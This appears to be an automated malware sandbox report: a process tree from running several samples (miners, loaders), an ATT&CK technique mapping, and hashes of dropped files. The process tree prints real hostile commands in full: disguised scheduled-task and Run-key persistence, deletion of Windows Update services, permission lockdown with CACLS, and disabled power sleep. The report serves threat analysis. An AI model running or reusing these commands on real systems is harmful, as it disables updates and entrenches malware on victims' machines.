"C:\Users\Admin\Desktop\malware\LK2.exe"
1⤵
PID:460

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uwjcnslmt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\Google\Chrome\updater.exe' }
1⤵
PID:656

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\Google\Chrome\updater.exe'
2⤵
- Creates scheduled task(s)
PID:2000

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:2960

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
2⤵
PID:2792

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
2⤵
PID:2700

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
2⤵
PID:2884

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
2⤵
PID:2036

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:1628

C:\Windows\System32\sc.exe
sc stop UsoSvc
2⤵
- Launches sc.exe
PID:1660

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:2556

C:\Windows\System32\sc.exe
sc stop wuauserv
2⤵
- Launches sc.exe
PID:2912

C:\Windows\System32\sc.exe
sc stop bits
2⤵
- Launches sc.exe
PID:2752

C:\Windows\System32\sc.exe
sc stop dosvc
2⤵
- Launches sc.exe
PID:2512

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:2444

C:\Users\Admin\AppData\Local\Temp\1000077001\aafg31.exe
"C:\Users\Admin\AppData\Local\Temp\1000077001\aafg31.exe"
3⤵
PID:3268

C:\Users\Admin\AppData\Local\Temp\1000078001\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\1000078001\toolspub2.exe"
3⤵
PID:788

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
2⤵
PID:2460

C:\Windows\SysWOW64\WSCript.exe
WSCript C:\Users\Admin\AppData\Local\Temp\SBADLH.vbs
3⤵
PID:3260

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn SBADLH.exe /tr C:\Users\Admin\AppData\Roaming\Windata\system.exe /sc minute /mo 1
3⤵
PID:3468

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn SBADLH.exe /tr C:\Users\Admin\AppData\Roaming\Windata\system.exe /sc minute /mo 1
4⤵
- Creates scheduled task(s)
PID:3500

C:\Windows\SysWOW64\WSCript.exe
WSCript C:\Users\Admin\AppData\Local\Temp\SBADLH.vbs
3⤵
PID:3012

C:\Windows\SysWOW64\WSCript.exe
WSCript C:\Users\Admin\AppData\Local\Temp\SBADLH.vbs
3⤵
PID:3656

C:\Windows\SysWOW64\WSCript.exe
WSCript C:\Users\Admin\AppData\Local\Temp\SBADLH.vbs
3⤵
PID:3120

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
2⤵
PID:2368

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
2⤵
PID:112

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
2⤵
PID:1964

C:\Users\Admin\AppData\Local\Temp\6942.exe
C:\Users\Admin\AppData\Local\Temp\6942.exe
1⤵
PID:2864

C:\Users\Admin\Desktop\malware\miner.exe
"C:\Users\Admin\Desktop\malware\miner.exe"
1⤵
PID:2996

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uwjcnslmt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\Google\Chrome\updater.exe' }
1⤵
PID:1980

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\Google\Chrome\updater.exe'
2⤵
- Creates scheduled task(s)
PID:2916

C:\Windows\system32\taskeng.exe
taskeng.exe {8713697E-84F3-4ED9-9B71-518E449A1C4D} S-1-5-21-3513876443-2771975297-1923446376-1000:GPFFWLPI\Admin:Interactive:[1]
1⤵
PID:824

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
2⤵
PID:1684

C:\Users\Admin\AppData\Roaming\FWDCznNyRu\MeWIPLCRzw.exe
C:\Users\Admin\AppData\Roaming\FWDCznNyRu\MeWIPLCRzw.exe
2⤵
PID:1624

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
2⤵
PID:3484

C:\Users\Admin\AppData\Roaming\Windata\system.exe
C:\Users\Admin\AppData\Roaming\Windata\system.exe
2⤵
PID:4040

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
2⤵
PID:3408

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
2⤵
PID:3256

C:\Users\Admin\AppData\Roaming\Windata\system.exe
C:\Users\Admin\AppData\Roaming\Windata\system.exe
2⤵
PID:2360

C:\Users\Admin\AppData\Roaming\efsdjiv
C:\Users\Admin\AppData\Roaming\efsdjiv
2⤵
PID:3652

C:\Program Files (x86)\Microsoft.NET\RedistList\DEVMin.exe
"C:\Program Files (x86)\Microsoft.NET\RedistList\DEVMin.exe"
2⤵
PID:4016

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
2⤵
PID:2964

C:\Users\Admin\AppData\Roaming\gasdjiv
C:\Users\Admin\AppData\Roaming\gasdjiv
2⤵
PID:1880

C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\spoolsv.exe
"C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\spoolsv.exe"
2⤵
PID:2344

C:\Users\Default User\lsass.exe
"C:\Users\Default User\lsass.exe"
2⤵
PID:3392

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
2⤵
PID:3044

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:1176

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
2⤵
PID:2220

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
2⤵
PID:2380

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
2⤵
PID:2824

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
2⤵
PID:1548

C:\Users\Admin\Desktop\malware\minerxd.exe
"C:\Users\Admin\Desktop\malware\minerxd.exe"
1⤵
PID:2360

C:\Users\Admin\AppData\Local\Temp\855B.exe
C:\Users\Admin\AppData\Local\Temp\855B.exe
1⤵
PID:1776

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
2⤵
PID:2264

C:\Windows\System32\sc.exe
sc stop dosvc
1⤵
- Launches sc.exe
PID:1656

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
1⤵
PID:1312

C:\Users\Admin\Desktop\malware\NINJA.exe
"C:\Users\Admin\Desktop\malware\NINJA.exe"
1⤵
PID:2460

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
"C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe"
1⤵
PID:2444

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "yiueea.exe" /P "Admin:N"&&CACLS "yiueea.exe" /P "Admin:R" /E&&echo Y|CACLS "..\577f58beff" /P "Admin:N"&&CACLS "..\577f58beff" /P "Admin:R" /E&&Exit
2⤵
PID:440

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN yiueea.exe /TR "C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe" /F
2⤵
- Creates scheduled task(s)
PID:1992

C:\Users\Admin\AppData\Local\Temp\9D60.exe
C:\Users\Admin\AppData\Local\Temp\9D60.exe
1⤵
PID:2880

C:\Users\Admin\AppData\Local\Temp\9D60.exe
C:\Users\Admin\AppData\Local\Temp\9D60.exe
2⤵
PID:812

C:\Windows\SysWOW64\cacls.exe
CACLS "yiueea.exe" /P "Admin:R" /E
1⤵
PID:2912

C:\Windows\SysWOW64\cacls.exe
CACLS "..\577f58beff" /P "Admin:N"
1⤵
PID:2636

C:\Users\Admin\Desktop\malware\PolymodXT.exe
"C:\Users\Admin\Desktop\malware\PolymodXT.exe"
1⤵
PID:2436

C:\Users\Admin\AppData\Local\Temp\A415.exe
C:\Users\Admin\AppData\Local\Temp\A415.exe
1⤵
PID:616

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
PID:936

C:\Windows\SysWOW64\cacls.exe
CACLS "..\577f58beff" /P "Admin:R" /E
1⤵
PID:884

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
1⤵
PID:2644

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
1⤵
- Creates scheduled task(s)
PID:1812

C:\Users\Admin\Desktop\malware\purchaseorder.exe
"C:\Users\Admin\Desktop\malware\purchaseorder.exe"
1⤵
PID:2580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2580 -s 1380
2⤵
- Program crash
PID:3832

C:\Users\Admin\Desktop\malware\toolspub4.exe
"C:\Users\Admin\Desktop\malware\toolspub4.exe"
1⤵
PID:2880

C:\Users\Admin\Desktop\malware\toolspub4.exe
"C:\Users\Admin\Desktop\malware\toolspub4.exe"
2⤵
PID:112

C:\Windows\SysWOW64\cacls.exe
CACLS "yiueea.exe" /P "Admin:N"
1⤵
PID:2556

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
1⤵
PID:1284

C:\Users\Admin\Desktop\malware\PolymodXT.exe
"C:\Users\Admin\Desktop\malware\PolymodXT.exe"
1⤵
PID:984

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:2440

C:\Users\Admin\Desktop\malware\NINJA.exe
"C:\Users\Admin\Desktop\malware\NINJA.exe"
1⤵
PID:1800

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\malware\LIMMin.exe"
1⤵
PID:2824

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\malware\LIMMin.exe"
1⤵
PID:2028

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:952

C:\Users\Admin\AppData\Local\Temp\9073.exe
C:\Users\Admin\AppData\Local\Temp\9073.exe
1⤵
PID:2088

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
1⤵
PID:1684

C:\Users\Admin\Desktop\malware\minerxd.exe
"C:\Users\Admin\Desktop\malware\minerxd.exe"
1⤵
PID:2864

C:\Users\Admin\AppData\Local\Temp\6942.exe
C:\Users\Admin\AppData\Local\Temp\6942.exe
2⤵
PID:2400

C:\Users\Admin\AppData\Local\Temp\6942.exe
"C:\Users\Admin\AppData\Local\Temp\6942.exe" --Admin IsNotAutoStart IsNotTask
3⤵
PID:3812

C:\Users\Admin\AppData\Local\Temp\6942.exe
"C:\Users\Admin\AppData\Local\Temp\6942.exe" --Admin IsNotAutoStart IsNotTask
4⤵
PID:3920

C:\Users\Admin\Desktop\malware\svcrun.exe
"C:\Users\Admin\Desktop\malware\svcrun.exe"
1⤵
PID:2756

C:\Users\Admin\Desktop\malware\UM.exe
"C:\Users\Admin\Desktop\malware\UM.exe"
1⤵
PID:1720

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
2⤵
PID:3148

C:\Users\Admin\Desktop\malware\upd.exe
"C:\Users\Admin\Desktop\malware\upd.exe"
1⤵
PID:3308

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
PID:4068

C:\Users\Admin\Desktop\malware\xxb.exe
"C:\Users\Admin\Desktop\malware\xxb.exe"
1⤵
PID:3296

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
1⤵
PID:1660

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
1⤵
PID:1876

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\csfogrhbhtai.xml"
1⤵
- Creates scheduled task(s)
PID:3556

C:\Windows\System32\sc.exe
sc stop bits
1⤵
- Launches sc.exe
PID:2532

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:1540

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
2⤵
PID:3816

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
3⤵
PID:4032

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
3⤵
PID:4088

C:\Windows\System32\sc.exe
sc stop wuauserv
1⤵
- Launches sc.exe
PID:2072

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
1⤵
- Launches sc.exe
PID:1312

C:\Windows\System32\sc.exe
sc stop UsoSvc
1⤵
- Launches sc.exe
PID:2980

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1362735762-104107760620228657071008444650-15179952612065679047-1945451565381427414"
1⤵
- Executes dropped EXE
PID:1660

C:\Users\Admin\Desktop\malware\miner.exe
"C:\Users\Admin\Desktop\malware\miner.exe"
1⤵
PID:2992

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:1756

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:3704

C:\Users\Admin\AppData\Local\Temp\9D60.exe
"C:\Users\Admin\AppData\Local\Temp\9D60.exe" --Admin IsNotAutoStart IsNotTask
1⤵
PID:1996

C:\Users\Admin\AppData\Local\Temp\9D60.exe
"C:\Users\Admin\AppData\Local\Temp\9D60.exe" --Admin IsNotAutoStart IsNotTask
2⤵
PID:2908

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
1⤵
PID:2284

C:\Windows\system32\taskeng.exe
taskeng.exe {B36167C8-4FC3-4D88-83EA-8E2CA6A201FF} S-1-5-21-3513876443-2771975297-1923446376-1000:GPFFWLPI\Admin:Interactive:[1]
1⤵
PID:1708

C:\Windows\system32\taskeng.exe
taskeng.exe {13E3E999-AD1E-4F5F-9438-044475579B8D} S-1-5-21-3513876443-2771975297-1923446376-1000:GPFFWLPI\Admin:Interactive:[1]
1⤵
PID:3520

C:\Users\Admin\AppData\Roaming\Windata\system.exe
C:\Users\Admin\AppData\Roaming\Windata\system.exe
2⤵
PID:2512

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
2⤵
PID:3228

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN yiueea.exe /TR "C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe" /F
3⤵
- Creates scheduled task(s)
PID:3940

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "yiueea.exe" /P "Admin:N"&&CACLS "yiueea.exe" /P "Admin:R" /E&&echo Y|CACLS "..\577f58beff" /P "Admin:N"&&CACLS "..\577f58beff" /P "Admin:R" /E&&Exit
3⤵
PID:1788

C:\Users\Admin\AppData\Roaming\FWDCznNyRu\MeWIPLCRzw.exe
C:\Users\Admin\AppData\Roaming\FWDCznNyRu\MeWIPLCRzw.exe
2⤵
PID:3008

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
2⤵
PID:3100

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
3⤵
- Creates scheduled task(s)
PID:4056

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Service Stop

T1489

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\INSTALLER\IFOGKVBUZB.exe
Filesize
678KB

MD5
d168db708441b436f5fea25caccb9cf6

SHA1
42907f6a6e365bb04312a5feeec7847029ac0b3f

SHA256
68d37d8610ddc6df7fe28ef6e4742addda045e43b8f01260a84d8a9b2ad39885

SHA512
0dfdd1b91699b64cef5296c44a7e3d7f36295c9d5593c2abc788082c1638949a264334679006c01273f0638edc65bf5cf57e396dd22b652b67382f0172a53e2f

Download Submit
C:\INSTALLER\sppsvc.exe
Filesize
1.7MB

MD5
5420cbcfdf9d9cde25c9587c240354dc

SHA1
c87ddf64e1acd3b64df896eb091f97717d438076

SHA256
6f5ab9b6c6bbbb3930d8d5e3efbd1432c2cbbcb7a4153a85174a9e1cae7475e5

SHA512
14de4a786f4cb314bb66a28280204cbfb3547722fe6466f65de242897e1fbf49575c6b9b056dd8cdb9074c2df69a0d7db6151a3aa2329ff51d269caeb0bb92e6

Download Submit
C:\Program Files (x86)\BandiMPEG1\bdfilters.dll
Filesize
4.1MB

MD5
ed730387fdcd684b756601b863c47417

SHA1
c49ed6d0d46facf4ceaeb21f5d6bfdf9e3587fde

SHA256
9cbc29696ad2d582e251bf9c4be5cce618753fa43551d2474e1ae5cc5e1245e5

SHA512
e32df727799d33922c6e92f94a7bdb0bc2772d6a6636d15e285d94d3ae4661062e5bc89ec3546b76ec853398f88d972f461327ef687f89093acf1096560d5c3f

Download Submit
C:\Program Files (x86)\Bandicam\bdcam.exe
Filesize
6.7MB

MD5
07f13560532e10ae79209d45de57f197

SHA1
849d8ced5122c6ebd34b2ad799d14fadbd95700d

SHA256
3051bee28ce9645a719621dfe43fe3b0c097c9f0b80ab67e3230b7be3d776e47

SHA512
03498c96f4b8d6b5e59379584bfe1597ef8c8969dbb10b4bf53f82988c17b5b3cf809ddbe524e172e50ab6be798f9efd4808a32a92dae388910549e7e454a44e

Download Submit
C:\Program Files (x86)\Bandicam\data\effects\effects20.dat
Filesize
228KB

MD5
4a22264f25cdac2709796db7a0b67d39

SHA1
dee39792e1a7ddae4ee2d083ea293a5205bdbb75

SHA256
42652ca47e2abf81efd93270364edd72e663faf184fe26b20a88946cc29935d7

SHA512
896035afd0fddd5dd08f42d79a22eabf102dfc797ce80c605eb9a3a2411f278172388c009d2d64d01dadf03a70a9b799a74b6e71bf3c22b0c768553b5d42e4ff

Download Submit
C:\Program Files (x86)\Bandicam\uninstall.exe
Filesize
173KB

MD5
0f458cd42178e37dad4ecc2e3919f08f

SHA1
bcaaa4122a4cc6b9c93f303c7052d32387693962

SHA256
3421772a9a78886029b22472d3a8db8099b041b74a8b1e6e65d8c8777b85c5de

SHA512
17fb52b42ee79eaca29cb41d3e70611d1b384a5f82a1ef22b6369e3ee30b87a9b7822279e53c31aa9194e5d693c989cecd34fa08143462c34656064401225714

Download Submit
C:\Program Files\Common Files\RCX2EC3.tmp
Filesize
1.7MB

MD5
7b4c52ffeb62388ae9e4174771f90bd4

SHA1
282d38d6a974055e24c27190d22331ebc9643b45

SHA256
4838b46a55389d775b77ec76898d4520cb420fa74a1a8a964a5375af51b53d8c

SHA512
8189bb7627909c9c2fc0ce79d6c0dca41777c50637e30e194dbe5699e514799877a3dd09bb0ceeb717401d2ecda3a93ba39d8d9d3c4ed15c1ef11c02b6f47ea1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
4118d1be9327d1a772007b59072de70f

SHA1
32b7bef36786a21edef047ddceb6e1ae77ae5e17

SHA256
395003ccd59f166709f2d3aace23dc3740582ac860ce5a04ad0095b7448e1aec

SHA512
f42f333d5c176e93dc7be19cd4f1e10805f5d839be053bcb0dd098cb54b27d49eb0559f1a63285de9a7149cef3dd6425a70b1a6f177066c304c83cb12f8e3c5b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
b2850d230fb4bfa4de9a1bf010dc3921

SHA1
90c274a55c6fd07bed1312b3a6eb22516ee820c4

SHA256
22f4a6d2ac7286a52b77868625fb96c506cdb00823a0eb41b1edf12777cd693f

SHA512
3c57e3657de6bf49439e732366ee8c03baa5e211eeca1e92416c1cf2587324ab36d32245e34f389875de7d733a787e7c709b7d2412189ae46c672f6416db996a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
3f4f414f115eb66a09f4bd02b491aa12

SHA1
f2329f77904fec78163261e7e9bd81cd3c74c0d2

SHA256
e2de6a1e672ac7b43f582ae1a0b7e1a86c6e1c5629b334f04e0218cc1e07cc6a

SHA512
27f4fc2098693f96738d717c598f132cb3b34fb2d863f0ca28dc896e795d81bf29e92155993fc6c5f01d34cb90bcee6a4bdfa81073fe30619835eb9081c65e84

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
a30bc13337dbdd389305416511e08fd4

SHA1
75e5d1a90646eb430707c8d7fb219c6d58aea843

SHA256
d57d8aa67fa233e417f3bd711ba4d322c021392ff2fc46f778539440e77b5ba5

SHA512
123ae8a03ad4fc5b51102ecff22cf4f50d46384efbef0af992f1a8f65a41c8d19d5c3a2315bd2e6376b72e9c8c7504ee24e77dc5e7416075a6b1dab649342238

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
1b1ac01e27f4178d4db690ecfaed48df

SHA1
763765ef3d8f70028be134e8108ed18036be8ef2

SHA256
3a2fc9bd545fd52896b97567d781232ab5e1b0d9eff997f622ffd243b4781c9c

SHA512
ec0bf355b549a48069b01a1c519131b62653388a938051187032141c39b551383f0a2ab185c56cb4003f9772b9a49df10a3b790c25aee9e4dc27655202601498

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
96b1ea770e1af5cc0b0a624a9a057866

SHA1
e83f98071ff6bde27fefafcb41f0354882f723c5

SHA256
073558854af93c30224646b04465a577c82c4550e475231de9f614e11d3f254a

SHA512
04df7f927b3190cc27c9595ed97907c5d622257f4ec88ab75d1c05c97bba1143add059dfc5a6c10e99e7758f73aa29f3e5a5124bae063f1cec09f6943575eb9a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
2fabc1e6930469a63a86a6b1f37d7755

SHA1
f01b9926b75fc280ef1d13241df01de9aa7f6092

SHA256
a77ff11fb42512566b07e7bd73742eb9b153e329ac215719e0f83b542c6a55b6

SHA512
626364acc4881da16349a431662da0b975f9167e60a41cf48a83be89a736c525d0be41b9969de02fca5e0bf9eb8f145e3904df2996416dbc06fff5612aa3bb67

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
a0176ca7cb937404bd180938790eed10

SHA1
3d860a58d303b454c1c0b0480769d25f2b90afff

SHA256
9498443740cf1ad0e3479d91f3227f17bbf4d12b8ad4de8d7cc1de5fbbd267be

SHA512
1922f63c36289321a6b61c70ce7c7243dc81ff2a7bca85dac6861758466c55bc24097f3d7f0c2848f911c3ddab6b1945d950aefee49aafe655e6ce98e9db4c00

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
07a0521effc4f653538e62fca4e3ffab

SHA1
b517749d4148654710c5a923f78fa6f32e4254e8

SHA256
69d9d1ea36be0089557e3e0087981b492d6d335cdd612a117dd824f80ff051ff

SHA512
